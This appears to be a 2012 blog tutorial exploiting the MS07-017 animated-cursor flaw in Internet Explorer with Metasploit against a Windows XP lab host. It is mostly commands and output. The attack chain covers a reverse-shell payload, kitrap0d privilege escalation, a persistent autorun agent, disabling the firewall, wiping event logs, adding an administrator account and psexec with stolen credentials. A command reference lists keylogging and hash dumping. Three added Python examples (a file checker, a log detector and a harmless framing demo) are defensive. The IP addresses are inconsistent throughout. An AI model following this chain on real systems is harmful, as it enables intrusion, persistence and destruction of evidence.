Monday, November 19, 2012

Tutorial: Exploiting IE with Windows Animated Cursor Vulnerability (MS07-017)

Local host (attacker):
192.168.1.105 (TEST-BT), a BackTrack machine running the Metasploit Framework

On the attacker machine:
msf > use windows/browser/ms07_017_ani_loadimage_chunksize
msf exploit(ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms07_017_ani_loadimage_chunksize) > set SRVHOST 192.168.1.105
msf exploit(ms07_017_ani_loadimage_chunksize) > set SRVPORT 8080
msf exploit(ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.105
msf exploit(ms07_017_ani_loadimage_chunksize) > set LPORT 443
msf exploit(ms07_017_ani_loadimage_chunksize) > set URIPATH /tryhard
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.105:443 
[*] Using URL: http://192.168.0.105:8080/tryhard
[*] Server started.
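What the module serves at that URL is a web page that makes Internet Explorer load a crafted .ANI (animated cursor) file. MS07-017 (CVE-2007-0038) is a stack buffer overflow in USER32's LoadAniIcon(): the "anih" chunk of the RIFF/ACON file is copied into a fixed 36-byte ANIHEADER structure using the attacker-controlled chunk size from the file, so a chunk declaring more than 36 bytes smashes the stack. The Python below is an added example, not part of the original tutorial and not Metasploit code: it walks the RIFF chunk structure the way a proxy filter or AV signature would and flags any anih chunk whose declared size is not 36, or any chunk that overruns its container. The sample files are constructed inline; the field values in GOOD_ANIH are arbitrary but well-formed.

```python
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): cbSize, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags


def iter_chunks(data, start, stop):
    """Yield (fourcc, declared_size, payload_offset) for RIFF chunks in data[start:stop]."""
    off = start
    while off + 8 <= stop:
        fourcc = bytes(data[off:off + 4])
        (size,) = struct.unpack_from("<I", data, off + 4)
        yield fourcc, size, off + 8
        off += 8 + size + (size & 1)  # RIFF chunks are padded to an even boundary


def check_ani(data):
    """Return a list of findings; an empty list means the file looks structurally sane."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON (animated cursor) file"]
    (riff_size,) = struct.unpack_from("<I", data, 4)
    stop = min(len(data), 8 + riff_size)
    containers = [(12, stop)]
    while containers:
        start, end = containers.pop()
        for fourcc, size, payload in iter_chunks(data, start, end):
            if payload + size > end:
                findings.append(f"{fourcc.decode('latin-1')} chunk size {size} overruns its container")
                break  # nothing after a lying size field can be trusted
            if fourcc == b"anih" and size != ANIH_SIZE:
                # LoadAniIcon() copied this many bytes into a 36-byte stack structure
                findings.append(f"anih chunk size {size} != {ANIH_SIZE} (MS07-017 trigger)")
            if fourcc == b"LIST":
                containers.append((payload + 4, payload + size))  # skip the list-type fourcc
    return findings


# --- constructed sample files (not taken from the page or from Metasploit) ---
def chunk(fourcc, payload):
    pad = b"\x00" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def ani(body):
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"ACON" + body


GOOD_ANIH = struct.pack("<9I", ANIH_SIZE, 1, 1, 32, 32, 32, 1, 10, 1)  # arbitrary but 36 bytes long
BENIGN = ani(chunk(b"anih", GOOD_ANIH)
             + chunk(b"LIST", b"fram" + chunk(b"icon", b"\x00" * 16)))
# A well-formed first anih followed by an oversized second one; only the size field matters here.
OVERSIZED = ani(chunk(b"anih", GOOD_ANIH) + chunk(b"anih", b"A" * 200))
# A chunk whose declared size is larger than the bytes actually present.
TRUNCATED = ani(b"anih" + struct.pack("<I", ANIH_SIZE) + b"\x00" * 10)

if __name__ == "__main__":
    for name, blob in ("benign", BENIGN), ("oversized", OVERSIZED), ("truncated", TRUNCATED):
        print(name, check_ani(blob) or "ok")
```

The check is deliberately structural rather than signature-based: it does not care what bytes follow the anih header, only that the declared size could not fit the fixed structure the parser copies into.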

On the victim machine:
This is the case where the exploit is not successful:

In the case where it is successful:
Switch back to your machine and check whether you have received the connection from the target.
Once connected, you can continue to interact with Meterpreter.

msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.0.105:8080...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.105:1162...
[*] Sending stage (748544 bytes) to 192.168.0.105
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.0.105:8080) at Wed Sep 29 12:08:22 +0800 2010

Press Enter to check the opened sessions.

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Type         Information                 Connection
  --  ----         -----------                 ----------
  1   meterpreter  LON-CL1\testuser @ LON-CL1  192.168.1.252:443 -> 192.168.0.105:8080

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: LON-CL1
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address  : 192.168.0.105
Netmask     : 255.255.255.0

Check our privilege level
meterpreter > getuid
Server username: LON-CL1\testuser

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeShutdownPrivilege
  SeChangeNotifyPrivilege
  SeUndockPrivilege

meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading  : /tmp/hacked.txt -> C:\WINDOWS\System32
[-] core_channel_open: Operation failed: 5

Error 5 is ERROR_ACCESS_DENIED: the session runs as the user who opened the browser, and that user has no write access to System32.

Escalate our privileges (kitrap0d is Tavis Ormandy's KiTrap0d/NtVdmControl() local kernel exploit, MS10-015 / CVE-2010-0232; it works here because the XP SP2 target is unpatched)
meterpreter > run kitrap0d
[*] Currently running as LON-CL1\testuser

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1316)...

--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---


[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x285ee bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180
[?] OpenProcess(180) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier

[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeTcbPrivilege
  SeCreateTokenPrivilege
  SeAssignPrimaryTokenPrivilege
  SeLockMemoryPrivilege
  SeIncreaseQuotaPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeCreatePermanentPrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeAuditPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeUndockPrivilege
  SeManageVolumePrivilege

meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading  : /tmp/hacked.txt -> C:\WINDOWS\System32
[*] uploaded   : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt

Maintain access by uploading Meterpreter agent
meterpreter > run persistence -h

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on the remote host where Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back


[-] Error in script: LocalJumpError unexpected return

meterpreter > run persistence -A -X -p 443 -r 192.168.0.105
[*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613927 bytes long
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc

Exit from the target system.

meterpreter > exit

Create a listener on our machine so that the persistent agent can connect back:
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.252
LHOST => 192.168.1.252
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.252:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.105:1176) at Wed Sep 29 12:30:27 +0800 2010

Clearing tracks (housekeeping)
Note that everything done after this point (enabling Remote Desktop, adding a user) writes fresh System and Security log entries, so on a real engagement the clearing step would come last.
meterpreter > run disable_audit

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies

OPTIONS:

    -d        Disable built in Firewall
    -h        Help menu.
    -k        Kill any AV, HIPS and Third Party Firewall process found.

meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*]     Domain profile configuration (current):
[*]     -------------------------------------------------------------------
[*]     Operational mode                  = Enable
[*]     Exception mode                    = Enable
[*]
[*]     Standard profile configuration:
[*]     -------------------------------------------------------------------
[*]     Operational mode                  = Enable
[*]     Exception mode                    = Enable
[*]
[*]     Internal firewall configuration:
[*]     -------------------------------------------------------------------
[*]     Operational mode                  = Enable
[*]
[*]     External firewall configuration:
[*]     -------------------------------------------------------------------
[*]     Operational mode                  = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...

meterpreter > clearev
[*] Wiping 942 records from Application...
[*] Wiping 1984 records from System...
[*] Wiping 1 records from Security...

Enabling and Accessing Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc

meterpreter > shell
Process 820 created.
Channel 18 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.

C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.


C:\Documents and Settings\testuser\Desktop>^C
Terminate channel 18? [y/N]  y

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address  : 192.168.1.105
Netmask     : 255.255.255.0

meterpreter >
Remote Desktop Connection

Open a new shell console, and run Remote Desktop client to connect to the target machine.

root@bt:~# rdesktop 192.168.1.105
WARNING: Remote desktop does not support colour depth 24; falling back to 16                                  

The exploit is detected by Kaspersky on the victim.

Using previously acquired credentials to gain a reverse shell (psexec)

The following example uses a previously acquired set of credentials to authenticate to the target over SMB and gain a reverse shell.


msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
--------------------------------------------------------------------------------

Analysis:
The file hikmEeEM.exe is written to C:\WINDOWS\hikmEeEM.exe (via the ADMIN$ share), run as a temporary service, and deleted once the connection is established.

This file is detected by most antivirus engines:
https://www.virustotal.com/file/6a1fcc88b5e1322dac078f9b07892aa31625504961f8b5063e467537f7b3eb49/analysis/1353334338/

Detection ratio: 28 / 43

The returned shell can be seen by following the TCP stream in Wireshark.

Two packets of the session are flagged by Wireshark as malformed, because the dissector for that port does not understand the payload's framing.
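Read from the defender's side, the chain on this page (clearev, getgui -e, net user /add, net localgroup administrators /add, psexec's temporary service) leaves a recognisable trail in the Security and System logs. The Python below is an added example, not from the tutorial and not Metasploit code: it runs a small detector over constructed sample event lines in a simplified "Channel|EventID|Message" form (not a real Windows export format). It uses the Windows XP/2003 event IDs because the target here is XP, lists the newer equivalents (4720, 4732, 1102, 4697, System 7045) in the same table, and flags psexec-style random eight-letter service names as a heuristic of this example's own. Two caveats the transcript itself supports: the Security log held a single record before clearev, so these Security events only appear when the matching audit category is enabled, and everything done after clearev is still there to be found.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "channel event_id message")

# XP/2003 IDs, as on the target in this tutorial, with the newer equivalents alongside.
SIGNALS = {
    ("Security", 517): "audit log cleared",
    ("Security", 1102): "audit log cleared",
    ("Security", 624): "user account created",
    ("Security", 4720): "user account created",
    ("Security", 636): "member added to local group",
    ("Security", 4732): "member added to local group",
    ("Security", 601): "service install attempted",
    ("Security", 4697): "service install attempted",
    ("System", 7045): "service installed",
    ("System", 7040): "service start type changed",
}
CLEAR_IDS = {("Security", 517), ("Security", 1102)}

# Heuristic (this example's own): exactly eight ASCII letters with both cases mixed, like ciWyCVEp.
RANDOM_NAME = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{8}$")


def parse(line):
    channel, event_id, message = line.split("|", 2)
    return Event(channel.strip(), int(event_id), message.strip())


def score(events):
    """Return one finding per event that matches the table, enriched where the message allows."""
    findings = []
    for ev in events:
        label = SIGNALS.get((ev.channel, ev.event_id))
        if label is None:
            continue
        finding = f"{ev.channel}/{ev.event_id}: {label}"
        if "service" in label:
            m = re.search(r"Service Name:\s*(\S+)", ev.message)
            if m and RANDOM_NAME.match(m.group(1)):
                finding += f" (random-looking name {m.group(1)}, psexec-style)"
        if label == "member added to local group" and "Administrators" in ev.message:
            finding += " (Administrators)"
        findings.append(finding)
    return findings


def events_after_clear(events):
    """clearev only removes what is already there; anything logged afterwards survives."""
    for i, ev in enumerate(events):
        if (ev.channel, ev.event_id) in CLEAR_IDS:
            return events[i + 1:]
    return []


# Constructed sample in a simplified form, not a real event log export.
SAMPLE = """\
Security|517|The audit log was cleared. Primary User Name: SYSTEM
System|7040|The start type of the Terminal Services service was changed from disabled to auto start.
Security|624|User Account Created: New Account Name: hacker  Caller User Name: SYSTEM
Security|636|Security Enabled Local Group Member Added: Target Account Name: Administrators  Member Name: LON-CL1\\hacker
System|7036|The Print Spooler service entered the running state.
Security|601|Attempt to Install Service: Service Name: ciWyCVEp  Service File Name: C:\\WINDOWS\\hikmEeEM.exe
"""
SAMPLE_EVENTS = [parse(line) for line in SAMPLE.splitlines()]

if __name__ == "__main__":
    for finding in score(SAMPLE_EVENTS):
        print(finding)
    print(len(events_after_clear(SAMPLE_EVENTS)), "events written after the log was cleared")
```

Each of these events is ordinary on its own; what makes the sequence worth an alert is a log clear followed within minutes by account creation, an Administrators membership change and a service install with a name no human chose.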

Metasploit Framework Exploits & Payloads



Exploits
All exploits in the Metasploit Framework will fall into two categories: active and passive.
Active exploits will exploit a specific host, run until completion, and then exit.
Passive exploits wait for incoming hosts and exploit them as they connect.

Payloads

There are three different types of payload module types in Metasploit: Singles, Stagers, and Stages.

Singles

Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe.

Stagers

Stagers set up a network connection between the attacker and the victim and are designed to be small and reliable.

Stages

Stages are payload components that are downloaded by stager modules.
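The transcript above shows this split in action: the reverse_tcp stager is the small piece that runs inside Internet Explorer and connects back to port 443, and "Sending stage (748544 bytes)" is the handler pushing the Meterpreter stage over the connection the stager opened. On the wire the classic reverse_tcp exchange is a 4-byte little-endian length followed by the stage body. The Python below is an added example, not from the tutorial and not Metasploit code: it plays both sides of that framing over a local socket pair. The "stager" here only receives the bytes into a buffer and returns them, it executes nothing, and the 16 MiB sanity limit is this example's addition (the real stager trusts the length it is sent). The stage content is constructed and meaningless.

```python
import socket
import struct
import threading


def send_stage(sock, stage):
    """Handler side: 4-byte little-endian length prefix, then the stage body."""
    sock.sendall(struct.pack("<I", len(stage)) + stage)


def recv_exact(sock, n):
    """recv() may return fewer bytes than asked for; loop until n bytes have arrived."""
    buf = bytearray()
    while len(buf) < n:
        part = sock.recv(min(65536, n - len(buf)))
        if not part:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes")
        buf += part
    return bytes(buf)


def fetch_stage(sock, max_len=16 * 1024 * 1024):
    """Stager side: read the length, then exactly that many bytes. Returns them, never runs them."""
    (length,) = struct.unpack("<I", recv_exact(sock, 4))
    if length > max_len:  # sanity limit added in this example; a real stager has none
        raise ValueError(f"stage length {length} exceeds {max_len}")
    return recv_exact(sock, length)


def demo(stage):
    """Run handler and stager against each other over a socketpair; return what the stager received."""
    handler, stager = socket.socketpair()
    sender = threading.Thread(target=send_stage, args=(handler, stage))
    sender.start()
    try:
        return fetch_stage(stager)
    finally:
        stager.close()   # unblocks the sender if the receiver bailed out early
        sender.join()
        handler.close()


def demo_truncated():
    """Handler announces 100 bytes but sends 10 and hangs up; the stager must notice, not hang."""
    handler, stager = socket.socketpair()
    handler.sendall(struct.pack("<I", 100) + b"x" * 10)
    handler.close()
    try:
        fetch_stage(stager)
    except ConnectionError as exc:
        return str(exc)
    finally:
        stager.close()
    return None


if __name__ == "__main__":
    fake_stage = bytes(range(256)) * 2924  # 748544 bytes, the size in the transcript; constructed content
    got = demo(fake_stage)
    print(len(got), got == fake_stage)
    print(demo_truncated())
```

The length prefix is also why the stage shows up as one large transfer immediately after the three-way handshake: a plain TCP session on 443 whose first server-to-client bytes are a small integer followed by several hundred kilobytes of non-TLS data is the shape a network sensor can key on.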

Meterpreter

Meterpreter, short for Meta-Interpreter, is an advanced, multi-faceted payload that operates via DLL injection.

PassiveX

PassiveX is a payload that can help in circumventing restrictive outbound firewalls. It does this by using an ActiveX control to create a hidden instance of Internet Explorer. Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses.

NoNX

The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory. In Windows, NX is implemented as Data Execution Prevention (DEP). The Metasploit NoNX payloads are designed to circumvent DEP.

Meterpreter Command Reference



Core Commands
=============

    Command        Description
    -------        -----------
    ?              Help menu
    background     Backgrounds the current session
    bgkill         Kills a background meterpreter script
    bglist         Lists running background scripts
    bgrun          Executes a meterpreter script as a background thread
    channel        Displays information about active channels
    close          Closes a channel
    exit           Terminate the meterpreter session
    help           Help menu
    interact       Interacts with a channel
    irb            Drop into irb scripting mode
    migrate        Migrate the server to another process
    quit           Terminate the meterpreter session
    read           Reads data from a channel
    run            Executes a meterpreter script
    use            Load one or more meterpreter extensions
    write          Writes data to a channel

Stdapi: File system Commands
============================

    Command        Description
    -------        -----------
    cat            Read the contents of a file to the screen
    cd             Change directory
    del            Delete the specified file
    download       Download a file or directory
    edit           Edit a file
    getlwd         Print local working directory
    getwd          Print working directory
    lcd            Change local working directory
    lpwd           Print local working directory
    ls             List files
    mkdir          Make directory
    pwd            Print working directory
    rm             Delete the specified file
    rmdir          Remove directory
    upload         Upload a file or directory

Stdapi: Networking Commands
===========================

    Command        Description
    -------        -----------
    ipconfig       Display interfaces
    portfwd        Forward a local port to a remote service
    route          View and modify the routing table

Stdapi: System Commands
=======================

    Command        Description
    -------        -----------
    clearev        Clear the event log
    drop_token     Relinquishes any active impersonation token
    execute        Execute a command
    getpid         Get the current process identifier
    getprivs       Get as many privileges as possible
    getuid         Get the user that the server is running as
    kill           Terminate a process
    ps             List running processes
    reboot         Reboots the remote computer
    reg            Modify and interact with the remote registry
    rev2self       Calls RevertToSelf() on the remote machine
    shell          Drop into a system command shell
    shutdown       Shuts down the remote computer
    steal_token    Attempts to steal an impersonation token from the target process
    sysinfo        Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreter's current desktop
    uictl          Control some of the user interface components

Priv: Elevate Commands
======================

    Command        Description
    -------        -----------
    getsystem      Attempt to elevate your privilege to that of local system

Priv: Password database Commands
================================

    Command        Description
    -------        -----------
    hashdump       Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command        Description
    -------        -----------
    timestomp      Manipulate file MACE attributes